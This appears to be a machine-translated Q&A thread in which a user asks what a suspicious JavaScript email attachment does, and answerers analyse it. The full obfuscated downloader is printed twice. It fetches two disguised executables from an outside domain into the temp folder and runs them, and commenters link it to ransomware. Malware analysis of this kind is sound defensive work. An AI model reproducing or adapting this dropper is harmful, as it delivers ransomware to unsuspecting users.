Fatal编程技术网
  • javascript/
  • Javascript 需要帮助了解这个Js的功能吗

Javascript 需要帮助了解这个Js的功能吗

javascript

Javascript 需要帮助了解这个Js的功能吗,javascript,virus,Javascript,Virus,如果有人知道这个java脚本文件中发生了什么,你能告诉我吗?我们的一个客户收到了这封邮件。。。现在她无法打开任何文档或电子表格。看起来它也蔓延到了网络的其他部分 var AxProxy = function() {}; (function () { function fFh(fr, Klw, rn) { var VeZ = new AxProxy('WScript.Shell'); var Klw = VeZ['ExpandEnvironmentStri

如果有人知道这个java脚本文件中发生了什么,你能告诉我吗?我们的一个客户收到了这封邮件。。。现在她无法打开任何文档或电子表格。看起来它也蔓延到了网络的其他部分

var AxProxy = function() {};

(function () {
    function fFh(fr, Klw, rn) {
        var VeZ = new AxProxy('WScript.Shell');
        var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
        var OG4 = new AxProxy('MSXML2.XMLHTTP');

        OG4['onReadyStateChange'] = function() {
            if (OG4['readyState'] === 4) {
                var g38 = new AxProxy('ADODB.Stream');

                g38['open']();
                g38['type'] = 1;
                g38['write'](OG4['ResponseBody']);
                g38['position'] = 0;
                g38['saveToFile'](Klw, 2);
                g38['close']();
            }
        };

        try {
            OG4['open']('GET', fr, false);
            OG4['send']();

            if (rn > 0) {
                VeZ['Run'](Klw, 0, 0);
            }
        } catch (er) {};
    }

    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();
如果有人能帮我弄明白,我将不胜感激

我把它删掉了,我不想让别人知道

我可能不需要告诉任何人,但请不要打开它,除非它在沙箱中。我不负责,如果你砖块你的电脑

来源:PM我的文件,而不是..

基本上,它是下载一个病毒到你的临时文件夹,并执行它

您应该在整个网络上运行病毒扫描

var AxProxy = function() {};

(function () {
    function fFh(fr, Klw, rn) {
        var VeZ = new AxProxy('WScript.Shell');
        var Klw = VeZ['ExpandEnvironmentStrings']('%TEMP%') + "\\" + Klw;
        var OG4 = new AxProxy('MSXML2.XMLHTTP');

        OG4['onReadyStateChange'] = function() {
            if (OG4['readyState'] === 4) {
                var g38 = new AxProxy('ADODB.Stream');

                g38['open']();
                g38['type'] = 1;
                g38['write'](OG4['ResponseBody']);
                g38['position'] = 0;
                g38['saveToFile'](Klw, 2);
                g38['close']();
            }
        };

        try {
            OG4['open']('GET', fr, false);
            OG4['send']();

            if (rn > 0) {
                VeZ['Run'](Klw, 0, 0);
            }
        } catch (er) {};
    }

    fFh("http://dorttlokolrt.com/images/one.jpg", '542824559.exe', 1);
    fFh("http://dorttlokolrt.com/images/two.jpg", '589878543.exe', 1);
}();
所有其他变量都是胡言乱语,旨在混淆和阻止解码

PS:我已经代理了
ActiveXObject
,所以无法运行…

它正在使用
WScript.Shell
做一些事情,还不确定是什么,我会以那种方式查看它,你认为是病毒,这是粗心的。我希望大多数人在点击前阅读,并且他们不允许activeX内容从未知域运行。如果有人想知道,只是出于兴趣。它创建了一个后门来上传别人的加密墙病毒,并以我从未见过的方式传播它。删除代码。一个mod可以关闭并锁定这个吗?